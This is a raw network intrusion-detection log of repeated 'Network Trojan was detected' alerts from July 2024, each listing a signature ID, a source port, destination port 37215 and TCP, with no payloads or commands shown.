                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833151
                  SID:2829579
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.506904
                  SID:2835222
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522185
                  SID:2835222
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2835222
                  Source Port:38112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.663550
                  SID:2829579
                  Source Port:51192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896950
                  SID:2829579
                  Source Port:43898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605633
                  SID:2829579
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117447
                  SID:2835222
                  Source Port:35822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.161022
                  SID:2835222
                  Source Port:56522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:58670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.079428
                  SID:2829579
                  Source Port:50314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.524637
                  SID:2829579
                  Source Port:33062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.951263
                  SID:2829579
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929842
                  SID:2829579
                  Source Port:49772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956514
                  SID:2835222
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.771022
                  SID:2829579
                  Source Port:59980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2835222
                  Source Port:58902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623094
                  SID:2829579
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.815817
                  SID:2835222
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926905
                  SID:2829579
                  Source Port:60042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2829579
                  Source Port:51734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2835222
                  Source Port:52010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560100
                  SID:2829579
                  Source Port:60482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821258
                  SID:2835222
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389913
                  SID:2829579
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004122
                  SID:2835222
                  Source Port:35466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2829579
                  Source Port:47570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2829579
                  Source Port:41840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.322147
                  SID:2835222
                  Source Port:57144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.576529
                  SID:2835222
                  Source Port:56860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.605681
                  SID:2829579
                  Source Port:50880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601192
                  SID:2829579
                  Source Port:47142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.695827
                  SID:2835222
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804848
                  SID:2829579
                  Source Port:52294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.527687
                  SID:2829579
                  Source Port:52164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.324879
                  SID:2829579
                  Source Port:41298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2835222
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037759
                  SID:2829579
                  Source Port:41108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.112679
                  SID:2835222
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.454005
                  SID:2835222
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2829579
                  Source Port:36720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2829579
                  Source Port:40574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238192
                  SID:2829579
                  Source Port:46754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867172
                  SID:2829579
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027039
                  SID:2835222
                  Source Port:32978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.745002
                  SID:2835222
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.664786
                  SID:2835222
                  Source Port:50288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652813
                  SID:2829579
                  Source Port:39564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.630762
                  SID:2835222
                  Source Port:44696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.112996
                  SID:2829579
                  Source Port:43546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2835222
                  Source Port:53008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592658
                  SID:2829579
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2835222
                  Source Port:56274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2835222
                  Source Port:36630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505876
                  SID:2835222
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2835222
                  Source Port:39768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2829579
                  Source Port:57422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2835222
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200421
                  SID:2835222
                  Source Port:42896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061341
                  SID:2829579
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682108
                  SID:2829579
                  Source Port:33392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2829579
                  Source Port:57524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2829579
                  Source Port:46706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.482822
                  SID:2835222
                  Source Port:60744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.845184
                  SID:2835222
                  Source Port:44518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:53894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911246
                  SID:2835222
                  Source Port:54866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2835222
                  Source Port:36682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2835222
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529525
                  SID:2835222
                  Source Port:59106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.476228
                  SID:2835222
                  Source Port:57054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835499
                  SID:2835222
                  Source Port:34858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.442977
                  SID:2829579
                  Source Port:58454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2835222
                  Source Port:41356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823884
                  SID:2829579
                  Source Port:42372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.859176
                  SID:2835222
                  Source Port:45756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.591498
                  SID:2829579
                  Source Port:58582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621778
                  SID:2835222
                  Source Port:55246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2829579
                  Source Port:52240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418573
                  SID:2835222
                  Source Port:50420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847226
                  SID:2829579
                  Source Port:35400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724469
                  SID:2835222
                  Source Port:58400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.240759
                  SID:2835222
                  Source Port:34226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2829579
                  Source Port:45946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.956024
                  SID:2835222
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.600329
                  SID:2829579
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350544
                  SID:2835222
                  Source Port:38942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2829579
                  Source Port:36554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.211493
                  SID:2835222
                  Source Port:47392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2829579
                  Source Port:42132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2829579
                  Source Port:46358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.919816
                  SID:2829579
                  Source Port:59266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.840251
                  SID:2835222
                  Source Port:54330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2835222
                  Source Port:59022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.116330
                  SID:2835222
                  Source Port:55914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2835222
                  Source Port:33910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861414
                  SID:2835222
                  Source Port:50166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2835222
                  Source Port:60088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.354961
                  SID:2829579
                  Source Port:47046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576651
                  SID:2829579
                  Source Port:37134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.165581
                  SID:2829579
                  Source Port:57684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2835222
                  Source Port:56086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2829579
                  Source Port:43724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.364562
                  SID:2835222
                  Source Port:37052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2835222
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393645
                  SID:2829579
                  Source Port:44670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657792
                  SID:2829579
                  Source Port:60340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896757
                  SID:2829579
                  Source Port:55446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.162511
                  SID:2835222
                  Source Port:57468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2829579
                  Source Port:56478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392563
                  SID:2829579
                  Source Port:60306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.523000
                  SID:2829579
                  Source Port:38002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.499089
                  SID:2835222
                  Source Port:45258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872058
                  SID:2835222
                  Source Port:57120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.945197
                  SID:2835222
                  Source Port:47562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.531122
                  SID:2835222
                  Source Port:40528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478512
                  SID:2835222
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744947
                  SID:2835222
                  Source Port:47602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.441013
                  SID:2835222
                  Source Port:51628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.258130
                  SID:2829579
                  Source Port:36516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655203
                  SID:2829579
                  Source Port:55124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.213994
                  SID:2835222
                  Source Port:33168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078747
                  SID:2835222
                  Source Port:53550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817942
                  SID:2835222
                  Source Port:43584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.874379
                  SID:2835222
                  Source Port:33914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.343631
                  SID:2835222
                  Source Port:44794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587895
                  SID:2835222
                  Source Port:38372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.727335
                  SID:2829579
                  Source Port:43214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.894621
                  SID:2835222
                  Source Port:52222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2829579
                  Source Port:58152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879292
                  SID:2829579
                  Source Port:55516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.340754
                  SID:2835222
                  Source Port:33270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2835222
                  Source Port:48446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2829579
                  Source Port:49638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.421673
                  SID:2829579
                  Source Port:57504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2829579
                  Source Port:57542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.805226
                  SID:2835222
                  Source Port:41202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2835222
                  Source Port:50938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2835222
                  Source Port:33352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161951
                  SID:2835222
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2829579
                  Source Port:47766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449751
                  SID:2835222
                  Source Port:33120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.957397
                  SID:2835222
                  Source Port:55566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2829579
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.669176
                  SID:2835222
                  Source Port:51086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2835222
                  Source Port:53326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2829579
                  Source Port:59850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607531
                  SID:2835222
                  Source Port:55994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2829579
                  Source Port:40590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.524945
                  SID:2829579
                  Source Port:48712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856431
                  SID:2835222
                  Source Port:50392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2835222
                  Source Port:45470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.372745
                  SID:2835222
                  Source Port:40514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2835222
                  Source Port:32912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400410
                  SID:2829579
                  Source Port:59688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2829579
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163941
                  SID:2829579
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.422156
                  SID:2829579
                  Source Port:38506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619153
                  SID:2835222
                  Source Port:50826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2835222
                  Source Port:43602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.458105
                  SID:2829579
                  Source Port:55406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2835222
                  Source Port:51862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430749
                  SID:2829579
                  Source Port:34060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.798934
                  SID:2835222
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.812772
                  SID:2829579
                  Source Port:56648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.700546
                  SID:2835222
                  Source Port:32910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515269
                  SID:2835222
                  Source Port:56402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2829579
                  Source Port:37986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830759
                  SID:2835222
                  Source Port:57832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136421
                  SID:2829579
                  Source Port:46486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405886
                  SID:2835222
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.222461
                  SID:2829579
                  Source Port:37144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.092800
                  SID:2835222
                  Source Port:34398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.475374
                  SID:2829579
                  Source Port:48832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2835222
                  Source Port:60596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070871
                  SID:2829579
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159538
                  SID:2835222
                  Source Port:58268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.406931
                  SID:2829579
                  Source Port:44732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.663185
                  SID:2829579
                  Source Port:60982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2829579
                  Source Port:50228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476661
                  SID:2829579
                  Source Port:50248
                  Destination Port:37215
